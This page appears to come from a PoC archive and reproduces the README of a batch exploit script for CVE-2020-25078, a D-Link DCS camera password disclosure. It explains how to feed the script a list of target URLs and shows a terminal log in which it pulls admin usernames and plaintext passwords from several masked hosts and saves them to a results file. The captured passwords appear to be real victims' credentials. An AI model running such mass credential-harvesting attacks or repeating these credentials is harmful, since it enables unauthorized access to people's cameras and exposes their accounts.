关联漏洞
描述
CVE-2020-25078账号密码信息泄露批量脚本Batch script of D-Link DCS series camera account password information disclosure
介绍
# CVE-2020-25078
# 使用说明
# instructions
攻击url放同一目录下 ip.txt
The attack IP is placed in the same directory as ip.txt
# Terminal log
root@localhost:~/CVE-2020-25078#ls
CVE-2020-25078.py
ip.txt
root@localhost:~/CVE-2020-25078#cat ./ip.txt
https://xxx.xxx.xxx.xxx:3128
http://xxx.xxx.xxx.xxx:80
https://xxx.xxx.xxx.xxx:8080
https://xxx.xxx.xxx.xxx:443
root@localhost:~/CVE-2020-25078#python3 ./CVE-2020-25078.py
Start Running Exploit...
[+Login URL]==> http://xxx.xxx.xxx.xxx:80
UserName: ['admin'] PassWord: ['Sruthimina123']
[+Login URL]==> http://xxx.xxx.xxx.xxx:443
UserName: ['admin'] PassWord: ['ming502219']
root@localhost:~/CVE-2020-25078# ls -l
CVE-2020-25078.py
exploit_ok.txt
ip.txt
README.md
root@localhost:~/CVE-2020-25078# cat ./exploit_ok.txt
[+Login URL]==>http://xxx.xxx.xxx.xxx:80
[+UserName]==>['admin'] [+PassWord]==>['Sruthimina123']
[+Login URL]==>http://xxx.xxx.xxx.xxx:443
[+UserName]==>['admin'] [+PassWord]==>['ming502219']
root@localhost:~/CVE-2020-25078#
# 免责声明
# Disclaimers
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article shall be borne by the user himself, and the author shall not bear any responsibility for this.
文件快照
[4.0K] /data/pocs/9738e22bbae84c024b2d7b968d9372c2a07e2d87
├── [1.7K] CVE-2020-25078.py
└── [1.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。